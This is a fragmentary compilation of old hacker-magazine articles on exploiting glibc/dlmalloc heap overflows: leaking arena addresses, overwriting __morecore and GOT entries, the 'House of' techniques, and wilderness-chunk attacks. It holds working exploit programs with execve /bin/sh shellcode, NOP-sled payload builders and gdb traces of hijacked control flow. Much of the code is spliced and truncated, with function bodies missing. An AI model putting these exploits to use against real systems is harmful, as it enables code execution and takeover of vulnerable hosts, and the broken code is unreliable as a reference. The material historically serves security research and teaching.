#define SOMEOFFSET 5 + (rand() % (SZ-1))
#define PREV_INUSE 1
#define IS_MMAP 2
./freeOutput
After the frontlink() macro is called with our supplied buffer, it gets
the address of the bin in which it is inserted:
(gdb) x/20x p
(gdb) c
Continuing.
(-) looking for bin address...
(!) found bin address -> 0x40018430
Although in this example we hit the cushion chunk in the first try on
purpose, this technique can be applied to brute force the location of our
output buffer also at the same time (if we don't know it beforehand).
--] 4.4.4 Vulnerability based heap memory leak - finding libc's data
---------------------------------------------------------------------------
--] 4.5 Abusing the leaked information
The idea is to obtain, from the previously gathered information, the
address of a malloc bin. This applies mainly to scenarios where we are
able to leak process heap memory. A bin address can be directly obtained
if the attacker is able to use the 'freeing the output' technique.
The obtained bin address can be used later to find the address of a
function pointer to overwrite with the address of our shellcode, as shown
in the next techniques.
        .
        .
        .
    [bin_X]
      [ptr] ----> [ <- fd ]
      [ptr] ----> [ <- bk ]    lonely but interesting chunk
        .
        .
Then, we can look for two equal memory addresses, one next to the
other, pointing into libc's memory (looking for addresses of
the form 0x4....... is enough for our purpose). We can suppose these
pairs of addresses are part of a free chunk which is the only
one hanging off a bin; we know it looks like...
size | fd | bk
[ ptr_2_libc's_memory | ptr_2_process'_heap ]
or
[ ptr_2_process'_heap | ptr_2_libc's_memory ]
We must take into account that this heuristic will not be as accurate
as searching for a pair of equal pointers into libc's address space, but
as we already said, it's possible to cross-check between multiple possible
chunks.
Finally, we must remember this depends totally on the way we are
abusing the process to read its memory. In case we can read arbitrary
memory addresses, this is not an issue; the problem gets harder the more
limited our mechanism to retrieve remote memory is.
Here, we show how to find a function pointer within the libc after
obtaining a malloc bin address, using one of the previously explained
mechanisms.
Using the size field of the retrieved chunk header and the bin_index() or
smallbin_index() macro, we obtain the exact address of the main_arena.
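In code, this recovery step is just pointer arithmetic (a sketch of the
same computation performed by the __morecore proof of concept later in
this section):
/* a lonely chunk's fd/bk point at its bin, and the bins are laid out as
 * an array of pointer pairs inside main_arena, so subtracting bin_index
 * pairs of pointers from the bin address yields the arena base */
unsigned long bin_to_arena (unsigned long bin_addr, unsigned long bin_index)
{
    return bin_addr - bin_index * 2 * sizeof (void *);
}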
We can cross-check between multiple supposed lonely chunks that the
main_arena address we obtained is the real one; the more lonely chunk
pairs we find, the more confident we can be. As long as the
process doesn't crash, we may retrieve heap memory several times, as
main_arena won't change its location. Moreover, I think it
wouldn't be wrong to assume main_arena is located at the same address
across different processes (this depends on the address at which the
libc is mapped). This may even be true across different server
processes, allowing us to retrieve the main_arena through a leak in a
process different from the one being actively exploited.
MORECORE() is called from the malloc() algorithm to extend the memory top,
requesting memory from the operating system via sbrk().
/* Try to extend */
malloc_extend_top(ar_ptr, nb);
We just need to sit and wait until the code reaches any of these points.
In some cases it may be necessary to arrange things in order to avoid the
code crashing before.
The morecore function pointer is called each time the heap needs to be
extended, so forcing the process to allocate a lot of memory is
recommended after overwriting the pointer.
In case we are not able to avoid a crash before taking control of the
process, there's no problem (unless the server dies completely), as we can
expect the libc to be mapped in the same address in most cases.
The following code just shows how to get the required information from a
freed chunk, calculate the address of __morecore and force a call
to MORECORE() after having overwritten it.
Let's look at what happens with gdb; we'll also be using a simple
modified malloc in the form of a shared library to know what is
going on inside malloc's internal structures.
Note we call malloc() again with another pointer, letting this aux
pointer be the chunk next to the top_chunk... this avoids the
different way a chunk adjacent to the top is handled when freed
(remember that in this special case the chunk would be coalesced with the
top_chunk without getting linked to any bin):
The chunk was freed and inserted into some bin... which was empty, as
this was the first chunk freed. So this is a 'lonely chunk', the
only chunk in its bin.
Here we can see both bk and fd pointing to the same address in
libc's memory; let's see how the main_arena looks now:
Note the freshly initialized main_arena with all its bins
pointing to themselves, and the free chunk just added to one of the
bins...
Using the known size of the chunk, we know in which bin it was
placed, so we can get main_arena's address and, finally, __morecore.
(gdb) bt
#0 0x41414141 in ?? ()
#1 0x4207a148 in malloc () from /lib/i686/libc.so.6
#2 0x0804869d in main (argc=1, argv=0xbffffad4) at heapy.c:52
#3 0x42017589 in __libc_start_main () from /lib/i686/libc.so.6
(gdb) frame 1
#1 0x4207a148 in malloc () from /lib/i686/libc.so.6
(gdb) x/i $pc-0x5
0x4207a143 <malloc+195>: call 0x4207a2f0 <chunk_alloc>
(gdb) disass chunk_alloc
Dump of assembler code for function chunk_alloc:
...
0x4207a8ac <chunk_alloc+1468>: mov 0x64c(%ebx),%eax
0x4207a8b2 <chunk_alloc+1474>: sub $0xc,%esp
0x4207a8b5 <chunk_alloc+1477>: push %esi
0x4207a8b6 <chunk_alloc+1478>: call *(%eax)
#include <stdio.h>
#include <stdlib.h>
free(chunk);
printf("(-) lonely chunk was freed, gathering information...\n");
fd = chunk[0];
bk = chunk[1];
arena = bk-bin*2*sizeof(void*);
printf("\t(!) &main_arena[0] @ 0x%X\n",arena);
morecore = arena-32;
printf("\t(!) __morecore @ 0x%X\n",morecore);
return 7;
}
In case the morecore trick doesn't work (we can always try, as it only
requires one attempt), which probably means our target is using a newer
libc, we still have the obtained glibc bin address. We know that glibc's
GOT is going to be located above that address.
We just need to bruteforce upwards until hitting an entry of a libc
function that is going to be called. This bruteforce mechanism may take a
while, but not more time than should be needed to bruteforce the main
object's GOT (in case we obtained its approximate location some way).
To speed up the process, the bruteforcing start point should be obtained
by adjusting the retrieved bin address with a fixed value. This value
should be large enough to skip over the arena, so we don't corrupt it and
crash the process. Also, the bruteforcing can be performed using a step
size bigger than one. A higher step value needs fewer tries, but may miss
the GOT. The step size should be calculated considering the GOT size and
the number of GOT entries accessed between each try (the more GOT entries
are used between tries, the higher the probability of modifying an entry
that's going to be accessed).
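A rough sketch of the loop just described follows; aa4bmo_write() stands
for the attacker's almost arbitrary write primitive, and START_OFFSET and
STEP are placeholder values, not figures from this article:

/* sketch: walk upwards from the leaked bin address, overwriting one
   candidate word per iteration with the address of our code, then force
   a few libc calls; if the word was a live GOT entry, we gain control */
#define START_OFFSET 0x1000    /* placeholder: enough to skip over the arena */
#define STEP         4         /* bigger steps mean fewer tries, may miss    */

extern void aa4bmo_write(unsigned long where, unsigned long what); /* assumed */
extern void do_little(void);          /* forces libc calls, shown below      */

void bruteforce_libc_got(unsigned long bin_addr, unsigned long code_addr)
{
    unsigned long guess = bin_addr + START_OFFSET;

    for (;;) {                 /* ends when an overwritten entry gets called */
        aa4bmo_write(guess, code_addr);
        do_little();
        guess += STEP;
    }
}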
Note the bruteforcing mechanism may crash the process in several ways, as
it is corrupting libc data.
The libc GOT bruteforcing idea was successfully tested on Red Hat 8.0,
Red Hat 7.2 and Red Hat 7.1 default installations.
Exploit code bruteforcing libc's GOT is able to exploit the vulnerable
CVS servers without any hardcoded addresses, at least on the above
mentioned default distributions.
The following code bruteforces itself: the process tries to find itself,
finally ending up in a useless endless loop.
#include <stdio.h>
#include <fcntl.h>
#define PREV_INUSE 1
#define IS_MMAP 2
#define NON_MAIN_ARENA 4
if(sz<13) sz = 13;
free(unlinkMe+SOMEOFFSET(sz));
return unlinkMe;
}
/* just force some libc function calls between each bruteforcing iteration */
void do_little(void){
int w,r;
char buf[256];
sleep(0);
w = open("/dev/null",O_WRONLY);
r = open("/dev/urandom",O_RDONLY);
read(r,buf,sizeof(buf));
write(w,buf,sizeof(buf));
close(r);
close(w);
return;
}
}
if(!bin){
printf("failed\n");
return 0;
}
$ ./got_bf
$ ./got_bf 143
$ ./got_bf 154
$ ./got_bf 155
$ ./got_bf 158
$ ./got_bf 180
$ ./got_bf 183
--] 4.5.5 Arena corruption (top, last remainder and bin modification)
---------------------------------------------------------------------------
--] 4.6 Copying the shellcode 'by hand'
Another trick that allows the attacker to know the exact location of the
injected shellcode is copying the shellcode to a fixed address using the
aa4bmo primitive.
As we can't write just any value, unaligned writes are needed to build the
shellcode in memory, writing 1 or 2 controlled bytes at a time.
We need to be able to copy the whole shellcode before the server crashes
in order to use this technique.
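The fragment below is only a sketch of the idea (aa4bmo_write() and
WRITABLE_BASE are assumptions, not code from this article): since the
written word must itself look like a writable address, only its low bytes
are freely chosen, so we advance the destination two bytes per write and
let each write's uncontrolled high bytes be overwritten by the next,
overlapping one.

#include <stddef.h>

#define WRITABLE_BASE 0x08100000UL    /* made-up writable address range */
extern void aa4bmo_write(unsigned long where, unsigned long what);  /* assumed */

/* build the shellcode at a fixed address, two controlled bytes per write */
void copy_by_hand(unsigned long dst, const unsigned char *sc, size_t len)
{
    size_t i;

    for (i = 0; i < len; i += 2) {
        unsigned long val = sc[i]
                          | ((unsigned long)(i + 1 < len ? sc[i + 1] : 0x90) << 8)
                          | (WRITABLE_BASE & 0xffff0000UL);  /* keep it pointer-like */
        aa4bmo_write(dst + i, val);   /* the trailing junk bytes get fixed by
                                         the next write                       */
    }
}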
---------------------------------------------------------------------------
--] 5 Conclusions
---------------------------------------------------------------------------
--] 6 Thanks
I'd like to thank a lot of people: 8a, beto, gera, zb0, raddy, juliano,
kato, javier burroni, fgsch, chipi, MaXX, lck, tomas, lau, nahual, daemon,
module, ...
Classifying you takes some time (some 'complex' ppl), so I'll just say
thank you for encouraging me to write this article, sharing your ideas,
letting me learn a lot from you every day, reviewing the article,
implementing the morecore idea for the first time, being my friends, asking
for torta, not making torta, personal support, coding nights, drinking
beer, ysm, roquefort pizza, teletubbie talking, making work very
interesting, making the world a happy place to live, making people hate
you because of the music...
(you should know which applies for you, do not ask)
---------------------------------------------------------------------------
--] 7 References
[1] http://www.malloc.de/malloc/ptmalloc2.tar.gz
ftp://g.oswego.edu/pub/misc/malloc.c
[2] www.phrack.org/phrack/57/p57-0x08
Vudo - An object superstitiously believed to embody magical power
Michel "MaXX" Kaempf
[3] www.phrack.org/phrack/57/p57-0x09
Once upon a free()
anonymous
[4] http://www.phrack.org/show.php?p=59&a=7
Advances in format string exploitation
gera and riq
[5] http://www.coresecurity.com/common/showdoc.php? \
idx=359&idxseccion=13&idxmenu=32
About exploits writing
gera
[6] http://online.securityfocus.com/bid/5363
[7] http://security.e-matters.de/advisories/012003.txt
[8] http://www.openwall.com/advisories/OW-002-netscape-jpeg.txt
JPEG COM Marker Processing Vulnerability in Netscape Browsers
Solar Designer
[9] http://lists.insecure.org/lists/bugtraq/2000/Nov/0086.html
Local root exploit in LBNL traceroute
Michel "MaXX" Kaempf
[10] http://www.w00w00.org/files/articles/heaptut.txt
w00w00 on Heap Overflows
Matt Conover & w00w00 Security Team
[11] http://www.phrack.org/show.php?p=49&a=14
Smashing The Stack For Fun And Profit
Aleph One
[12] http://phrack.org/show.php?p=55&a=8
The Frame Pointer Overwrite
klog
[13] http://www.phrack.org/show.php?p=59&a=9
Bypassing PaX ASLR protection
[email protected]
[14] http://phrack.org/show.php?p=58&a=4
The advanced return-into-lib(c) exploits
Nergal
---------------------------------------------------------------------------
Appendix I - malloc internal structures overview
These are the macros used to index into a bin depending on the chunk size:
#define MAX_SMALLBIN 63
#define MAX_SMALLBIN_SIZE 512
#define SMALLBIN_WIDTH 8
#define is_small_request(nb) ((nb) < MAX_SMALLBIN_SIZE - SMALLBIN_WIDTH)
#define smallbin_index(sz) (((unsigned long)(sz)) >> 3)
#define bin_index(sz)                                                         \
(((((unsigned long)(sz)) >> 9) ==    0) ?       (((unsigned long)(sz)) >>  3):\
 ((((unsigned long)(sz)) >> 9) <=    4) ?  56 + (((unsigned long)(sz)) >>  6):\
 ((((unsigned long)(sz)) >> 9) <=   20) ?  91 + (((unsigned long)(sz)) >>  9):\
 ((((unsigned long)(sz)) >> 9) <=   84) ? 110 + (((unsigned long)(sz)) >> 12):\
 ((((unsigned long)(sz)) >> 9) <=  340) ? 119 + (((unsigned long)(sz)) >> 15):\
 ((((unsigned long)(sz)) >> 9) <= 1364) ? 124 + (((unsigned long)(sz)) >> 18):\
                                          126)
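As a quick sanity check of the indexing above (illustrative values only):
sizes below MAX_SMALLBIN_SIZE map straight into a smallbin, one bin every
8 bytes.

#include <stdio.h>

#define smallbin_index(sz) (((unsigned long)(sz)) >> 3)

int main(void)
{
    printf("%lu\n", smallbin_index(40));   /* 5: a 40 byte chunk goes to bin 5 */
    printf("%lu\n", smallbin_index(504));  /* 63: the last of the small bins   */
    return 0;
}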
These are the macros used throughout the source code to access the bins.
We can see the first two bins are never indexed; they refer to the
topmost chunk, the last_remainder chunk and a bitvector used to
improve lookup time, though this is not really important for us.
The main_arena is the place where the allocator stores the 'bins' to which
the free chunks are linked depending on their size.
The little graph below summarizes the structures detailed before:
            .
            .
            .
   [bin_X]
   [fd ptr] ----> [ <- fd ]
                  [ lonely but interesting chunk ]
   [bk ptr] ----> [ <- bk ]
            .
            .
8. The Malloc Maleficarum - Phantasmal Phantasmagoria
by Phantasmal Phantasmagoria
[email protected]
[--------------------------------
In late 2001, "Vudo Malloc Tricks" and "Once Upon A free()" defined
the exploitation of overflowed dynamic memory chunks on Linux. In
late 2004, a series of patches to GNU libc malloc implemented over
a dozen mandatory integrity assertions, effectively rendering the
existing techniques obsolete.
[--------------------------------
[--------------------------------
void
_int_free(mstate av, Void_t* mem)
{
mchunkptr p; /* chunk corresponding to mem */
INTERNAL_SIZE_T size; /* its size */
mfastbinptr* fb; /* associated fastbin */
...
p = mem2chunk(mem);
size = chunksize(p);
Note that the designer does not control the value of p. It can
therefore be assumed that the test for misalignment will fail. On
the other hand, the designer does control the value of size. In
fact, it is the most important aspect of control that the designer
possesses, yet its range is already being limited. For the
House of Prime the exact upper limit of size is not important. The
lower limit, however, is crucial in the correct execution of this
technique. The chunksize() macro is defined as follows:
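(The macro body did not survive in this copy; in the glibc 2.3.x sources
it reads approximately as follows, stripping the three low-order flag bits
from the size field.)

#define PREV_INUSE     0x1
#define IS_MMAPPED     0x2
#define NON_MAIN_ARENA 0x4
#define SIZE_BITS      (PREV_INUSE|IS_MMAPPED|NON_MAIN_ARENA)

#define chunksize(p)   ((p)->size & ~(SIZE_BITS))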
set_fastchunks(av);
fb = &(av->fastbins[fastbin_index(size)]);
p->fd = *fb;
*fb = p;
}
This is the fastbin code. Exactly what a fastbin is and why fastbins
are used is beyond the scope of this document, but remember that
the first step in the House of Prime is to overwrite the fastbin
maximum size variable, av->max_fast. In order to do this the
designer must first provide a chunk with the lower limit size,
which was derived above. Given that the default value of
av->max_fast is 72, it is clear that the fastbin code will be used for
such a small size. However, exactly why this results in the
corruption of av->max_fast is not immediately apparent.
...
INTERNAL_SIZE_T max_fast;
mfastbinptr fastbins[NFASTBINS];
mchunkptr top;
...
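The struct fragment above is the key. A short annotated recap (the
fastbin_index() definition is quoted from the glibc 2.3.x sources, the
rest is commentary assuming the lower limit size of 8 referred to above):

/* #define fastbin_index(sz)  ((((unsigned int)(sz)) >> 3) - 2)
 *
 * With the overflowed chunk's size set to 8, fastbin_index(8) == -1, so:
 *
 *     fb  = &(av->fastbins[-1]);   // one slot before fastbins[]: av->max_fast
 *     *fb = p;                     // max_fast now holds the chunk's address
 *
 * A heap address is a very large value, so from this point on practically
 * every size is considered "fast", which is what the rest of the House of
 * Prime builds upon.
 */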
Due to the fact that the arena structure and the arena_key come
from different source files, exactly when this does and doesn't
happen depends on how the target libc was compiled and linked. I
have seen the cards fall both ways, so it is an important point to
make. For now it will be assumed that the arena_key is at a higher
address, and is thus over-writable by the fastbin code.
Void_t*
public_mALLOc(size_t bytes)
{
mstate ar_ptr;
Void_t *victim;
...
arena_get(ar_ptr, bytes);
if(!ar_ptr)
return 0;
victim = _int_malloc(ar_ptr, bytes);
...
return victim;
}
Once execution passes to _int_malloc() there are two ways for the
designer to proceed. The first is to use the fastbin allocation
code:
Void_t*
_int_malloc(mstate av, size_t bytes)
{
INTERNAL_SIZE_T nb; /* normalized request size */
unsigned int idx; /* associated bin index */
mfastbinptr* fb; /* associated fastbin */
mchunkptr victim; /* inspected/selected chunk */
checked_request2size(bytes, nb);
fb = &(av->fastbins[idx]);
if ( (victim = *fb) != 0) {
if (fastbin_index (chunksize (victim)) != idx)
malloc_printerr (check_action, "malloc(): memory"
" corruption (fast)", chunk2mem (victim));
*fb = victim->fd;
check_remalloced_chunk(av, victim, nb);
return chunk2mem(victim);
}
}
for(;;) {
while ( (victim = unsorted_chunks(av)->bk) !=
unsorted_chunks(av)) {
bck = victim->bk;
size = chunksize(victim);
if (in_smallbin_range(nb) &&
bck == unsorted_chunks(av) &&
victim == av->last_remainder &&
(unsigned long)(size) > (unsigned long)(nb + MINSIZE)) {
...
}
unsorted_chunks(av)->bk = bck;
bck->fd = unsorted_chunks(av);
if (size == nb) {
...
return chunk2mem(victim);
}
...
[--------------------------------
Perhaps the most useful and certainly the most general technique in
the Malloc Maleficarum is the House of Mind. The House of Mind has
the distinct advantage of causing a direct memory overwrite with
just a single call to free(). In this sense it is the closest
relative in the Malloc Maleficarum to the traditional unlink()
technique.
void
public_fREe(Void_t* mem)
{
mstate ar_ptr;
mchunkptr p; /* chunk corresponding to mem */
...
p = mem2chunk(mem);
...
ar_ptr = arena_for_chunk(p);
...
_int_free(ar_ptr, mem);
#define heap_for_ptr(ptr) \
((heap_info *)((unsigned long)(ptr) & ~(HEAP_MAX_SIZE-1)))
#define arena_for_chunk(ptr) \
(chunk_non_main_arena(ptr)?heap_for_ptr(ptr)->ar_ptr:&main_arena)
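To make the macros concrete, a worked example with made-up addresses
(HEAP_MAX_SIZE defaults to 1MB in this generation of glibc):

/* Suppose the overflowed chunk p lives at 0x081002a0 and the overflow set
 * the NON_MAIN_ARENA bit in its size field.  Then:
 *
 *     arena_for_chunk(p)  ->  heap_for_ptr(p)->ar_ptr
 *     heap_for_ptr(p)     ==  0x081002a0 & ~(0x100000 - 1)  ==  0x08100000
 *
 * If the designer has previously made the application allocate enough
 * data to control the memory at 0x08100000, the fake heap_info placed
 * there supplies an ar_ptr of the designer's choosing, and _int_free()
 * goes on to work with a completely designer controlled "arena" (see the
 * unsorted bin code that follows).
 */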
bck = unsorted_chunks(av);
fwd = bck->fd;
p->bk = bck;
p->fd = fwd;
bck->fd = p;
fwd->bk = p;
set_fastchunks(av);
fb = &(av->fastbins[fastbin_index(size)]);
...
p->fd = *fb;
*fb = p;
}
[--------------------------------
The House of Force works by tricking the top code into setting the
wilderness pointer to an arbitrary value, which can result in an
arbitrary chunk of data being returned to the requesting
application. This requires two calls to malloc(). The major
disadvantage of the House of Force is that the first call must have
a completely designer controlled request size. The second call must
simply be large enough to trigger the wilderness code, while the
chunk returned must be (to some extent) designer controlled.
Void_t*
_int_malloc(mstate av, size_t bytes)
{
INTERNAL_SIZE_T nb; /* normalized request size */
mchunkptr victim; /* inspected/selected chunk */
INTERNAL_SIZE_T size; /* its size */
mchunkptr remainder; /* remainder from a split */
Once the wilderness pointer has been set to the arbitrary remainder
chunk, any calls to malloc() with a large enough request size to
trigger the top chunk will be serviced by the designer's
wilderness. Thus the only restriction on the new wilderness is that
the size must be larger than the request that is triggering the top
code. In the case of the wilderness being set to overflow a GOT
entry this is never a problem. It is then simply a matter of
finding an application specific scenario in which such a call to
malloc() is used for a designer controlled buffer.
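A back-of-the-envelope sketch of the sizes involved (the addresses are
invented for illustration, and the request2size() padding is only
approximated):

/* step 1: the overflow sets the wilderness size to a huge value, e.g.
 *         0xffffffff, so any request appears to fit in the top chunk
 *
 * step 2: the designer controlled request moves the top pointer:
 *
 *             new_top = old_top + nb        // top code: chunk_at_offset()
 *
 *         so to park the new wilderness just below a target, say a GOT
 *         entry at 0x08049f00, choose roughly:
 *
 *             nb = 0x08049f00 - 8 - old_top
 *
 * step 3: the next large enough call to malloc() is carved out of the
 *         fake wilderness and hands the application a buffer sitting on
 *         top of the GOT
 */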
[--------------------------------
Void_t*
_int_malloc(mstate av, size_t bytes)
{
....
checked_request2size(bytes, nb);
if (in_smallbin_range(nb)) {
idx = smallbin_index(nb);
bin = bin_at(av,idx);
Note that in order to reach the actual smallbin unlink code there
must be at least one chunk in the bin corresponding to the
smallbin_index() for the current request. Assume that a small chunk
of data size N has previously been passed to free(), and that it
has made its way into the corresponding smallbin for chunks of
absolute size (N + 8). Assume that the designer can overflow this
chunk with arbitrary data. Assume also that the designer can
subsequently trigger a call to malloc() with a request size of N.
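Under these assumptions the smallbin code works straight into the
designer's hands. A compressed sketch of the flow (not verbatim glibc
code; FAKE stands for the designer chosen address):

/*   // the freed chunk p already sits in its smallbin: bin->bk == p
 *   overflow:    p->bk = FAKE;                // designer chosen address
 *
 *   malloc(N):   victim = last(bin) = p;      // the real chunk, returned
 *                bin->bk = p->bk;             // == FAKE
 *                FAKE->fd = bin;              // so FAKE must be writable
 *
 *   malloc(N):   victim = last(bin) = FAKE;   // the fake chunk this time
 *                bck = FAKE->bk;              // must point to writable memory
 *                bck->fd = bin;
 *                return chunk2mem(FAKE);      // handed to the application
 */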
This rules out pointing the victim chunk at a GOT or .dtors entry.
Instead, the designer must point victim to a position on the stack
such that victim->bk is a pointer to writable memory yet still
close enough to a saved return address such that it can be
overwritten by the application's general use of the chunk.
Alternatively, an application specific approach may be taken that
targets the use of function pointers. Whichever method used, the
arbitrary malloc() chunk must be designer controlled to some extent
during its use by the application.
For the House of Lore, the only other interesting situation is when
the overflowed chunk is large. In this context large means anything
bigger than the maximum smallbin chunk size. Again, it is necessary
for the overflowed chunk to have previously been processed by
free() and to have been put into a largebin by malloc().
victim = last(bin);
..
size = chunksize(victim);
remainder_size = size - nb;
bck = victim->bk;
bin->bk = bck;
bck->fd = bin;
There are only two conditions. The first is exactly the same as the
case of smallbin corruption, the bk pointer of the arbitrary chunk
being returned to the application must point to writable memory (or
the setting of bck->fd will cause a segmentation fault).
The other condition is not obvious from the limited code that has
been presented above. If the remainder_size value is not less than
MINSIZE, then glibc malloc attempts to split off a chunk at victim
+ nb. This includes calling the set_foot() macro with victim + nb
and remainder_size as arguments. In effect, this tries to set
victim + nb + remainder_size to remainder_size. If the
chunksize(victim) (and thus remainder_size) is not designer
controlled, then set_foot() will likely try to set an area of
memory that isn't mapped into the address space (or is read-only).
[--------------------------------
There is one more requirement for the layout of the fakechunk data
which will be described shortly. For the moment, assume that all of
the above conditions have been met, and that a call to free() is
made on the suitable fakechunk. A call to free() is handled by a
wrapper function called public_fREe():
void
public_fREe(Void_t* mem)
{
mstate ar_ptr;
mchunkptr p; /* chunk corresponding to mem */
...
p = mem2chunk(mem);
if (chunk_is_mmapped(p))
{
munmap_chunk(p);
return;
}
...
ar_ptr = arena_for_chunk(p);
...
_int_free(ar_ptr, mem);
[--------------------------------
The virtual adept does not own the information it creates, and thus
has no right or desire to profit from it. The virtual adept exists
purely to manifest the infinite potential of information in to
information itself, and to minimize the complexity of an
information request in a way that will benefit all conscious
entities. What is not information is not consequential to the
virtual adept, not money, not fame, not power.
Am I a hacker? No.
I am a student of virtuality.
I am the witch malloc,
I am the cult of the otherworld,
and I am the entropy.
I am Phantasmal Phantasmagoria,
and I am a virtual adept.
[--------------------------------
9. Exploiting The Wilderness - Phantasmal Phantasmagoria
1 - Introduction
1.1 Prelude
1.2 The wilderness
2 - Exploiting the wilderness
2.1 Exploiting the wilderness with malloc()
2.2 Exploiting the wilderness with an off-by-one
3 - The wilderness and free()
4 - A word on glibc 2.3
5 - Final thoughts
- ------------------------------------
- ---- Prelude
/* START wilderness.c */
#include <stdio.h>
Keep in mind that the prev_size field is not used by dlmalloc if the
previous chunk is allocated, and in that situation can become part of
the data of the previous chunk to decrease wastage. The wilderness chunk
does not utilize prev_size (there is no possibility of the top chunk
being consolidated) meaning it is included at the end of the 'first'
buffer at [A] as part of its 1020 bytes of data. Again, the same applies
to the 'second' buffer at [C].
The wilderness chunk being handled specially by the dlmalloc system led
to Michel "MaXX" Kaempf stating in his 'Vudo malloc tricks' [2] article,
"The wilderness chunk is one of the most dangerous opponents of the
attacker who tries to exploit heap mismanagement". It is this special
handling of the wilderness that we will be manipulating in our exploits,
turning the dangerous opponent into, perhaps, an interesting conquest.
- ------------------------------------
Looking at our sample code above we can see that a typical buffer overflow
exists at [B]. However, in this situation we are unable to use the
traditional
unlink technique due to the overflowed buffer being contiguous to the
wilderness and the lack of a relevant call to free(). This leaves us
with the second call to malloc() at [C] - we will be exploiting the special
code used to set up our 'second' buffer from the wilderness.
Based on the knowledge that the 'first' buffer borders the wilderness,
it is clear that not only can we control the prev_size and size elements
of the top chunk, but also a considerable amount of space after the chunk
header. This space is the top chunk's unused data area and proves crucial
in forming a successful exploit.
Let's have a look at the important chunk_alloc() code called from our
malloc() requests:
victim = top(ar_ptr);                        /* serve the request from the wilderness */
set_head(victim, nb | PREV_INUSE);
top(ar_ptr) = chunk_at_offset(victim, nb);   /* the new top starts right after our chunk */
set_head(top(ar_ptr), remainder_size | PREV_INUSE);
return victim;
Finally, we can reach our call to chunk_free(). Let's look at the important
bits:
INTERNAL_SIZE_T hd = p->size;
...
if (!(hd & PREV_INUSE)) /* consolidate backward */ /* [A] */
{
prevsz = p->prev_size;
p = chunk_at_offset(p, -(long)prevsz); /* [B] */
sz += prevsz;
if (p->fd == last_remainder(ar_ptr))
islr = 1;
else
unlink(p, bck, fwd);
}
This leaves us with one other choice: creating a fake chunk relatively
positive to the start of the wilderness. This can be achieved by setting
p->prev_size to a small negative number, turned into a small positive
number at [B]. This would require the specially crafted forward and back
pointers to be situated at the start of the wilderness' unused data area,
just after the chunk header. Similar to the overflowed size variable
discussed above, this is convenient as the negative number need not contain
NULL bytes, allowing us to continue the payload into the data area.
|...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPPPP|SSSSWWWWFFFFBBBBWWWWWWWW...|
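Concretely (a sketch of the arithmetic, not code from the article), with
p->prev_size overflowed to -4 the backward consolidation code at [B] lands
inside memory we control:

/*   prevsz = p->prev_size;                      // 0xfffffffc, i.e. -4
 *   p      = chunk_at_offset(p, -(long)prevsz); // (char *)p - (-4)
 *                                               // == (char *)p + 4
 *
 * The "previous" chunk therefore begins 4 bytes *forward*, inside the
 * wilderness, and the fd/bk pointers consumed by unlink() are read from
 * the unused data area just after the top chunk's header -- exactly where
 * the FFFF and BBBB words sit in the payload above.
 */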
We're now ready to write our exploit for the vulnerable code discussed
above. Keep in mind that a malloc request for 1020 is padded up to 1024
to contain room for the size field, so we are exactly contiguous to the
wilderness.
0x8049680 | polygoria!
/* START exploit.c */
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
p = payload;
memset(p, '\x90', 1052);
p += 4;
*(p) = '\0';
/* START wilderness2.c */
#include <stdio.h>
Looking at this sample code we can see the off-by-one error occurring
at [A]. The loop copies 1021 bytes of argv[1] into a buffer, 'first',
allocated only 1020 bytes. As the 'first' buffer was split off the top
chunk in its allocation, it is exactly contiguous to the wilderness.
This means that our one byte overflow destroys the least significant
byte of the top chunk's size field.
Assuming that our larger second request to malloc() will attempt to extend
the heap, we now have to address the other steps in running the fencepost
chunk_free() call. We know that we can comfortably reach the fencepost
code as we are modifying the size element of the wilderness. The inner
if statement leading to the chunk_free() is usually triggered as either
our old_top_size is greater than 16, or the wilderness' size is small
enough that controlling the least significant byte is enough to make
old_top_size wrap around when MINSIZE is subtracted from it. Finally,
the chunk header modifying calls are unimportant, so long as they occur
in allocated memory as to avoid a premature segfault. The reason for
this will become clear in a short while. All we have left to do is to
ensure that the PREV_INUSE bit is cleared for backwards consolidation
at the chunk_free(). This is made trivial by our control of the size
field.
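As a purely illustrative example of that last point (the concrete values
depend on the heap layout and are not taken from the article):

/*   before the overflow:   top->size = 0x00000fd9   (0xfd8 | PREV_INUSE)
 *   one byte overflow:     top->size = 0x00000f90   (filler byte 0x90)
 *
 * A single even byte written over the least significant byte clears
 * PREV_INUSE and changes the low byte of the wilderness' size, which are
 * the two properties the fencepost path described above relies on.
 */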
|FFFFBBBBDDDDDDDDD...DDDDDDDDPPPP|SWWWWWWWWWWW...|
/* START exploit2.c */
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
p = payload;
memset(p, '\x90', 1028);
*(p + 1021) = '\0';
- ------------------------------------
/* START wilderness3a.c */
#include <stdio.h>
INTERNAL_SIZE_T hd = p->size;
INTERNAL_SIZE_T sz;
...
mchunkptr next;
INTERNAL_SIZE_T nextsz;
...
sz = hd & ~PREV_INUSE;
next = chunk_at_offset(p, sz);
nextsz = chunksize(next); /* [A] */
if (next == top(ar_ptr))
{
sz += nextsz; /* [B] */
Here we see the code from chunk_free() used to handle requests involving
the wilderness. Note that the backward consolidation within the 'top'
code at [C] is uninteresting as we do not control the needed prev_size
element. This leaves us with the hope of using the following call to
malloc() as described above.
In this situation we control the value of nextsz at [A]. We can see that
the chunk being freed is consolidated with the wilderness. We can control
the new wilderness' size as it is adjusted with our nextsz at [B], but
unfortunately, the PREV_INUSE bit is set at the call to set_head() at
[D]. The reason this is a bad thing becomes clear when considering the
Keeping with the idea of exploiting the following call to malloc() using
the fencepost code, there are a few other options - all of which appear
to be impossible. Firstly, forward consolidation. This is made unlikely
by the fencepost chunk header modifying calls discussed above, as they
usually ensure that the test for forward consolidation will fail. The
frontlink() macro has been discussed [2] as another possible method of
exploiting dlmalloc, but since we do not control any of the traversed
chunks this technique is uninteresting. The final option was to use the
fencepost chunk header modifying calls to partially overwrite a GOT entry
to point into an area of memory we control. Unfortunately, all of these
modifying calls are aligned, and there doesn't seem to be anything else
we can do with the values we can write.
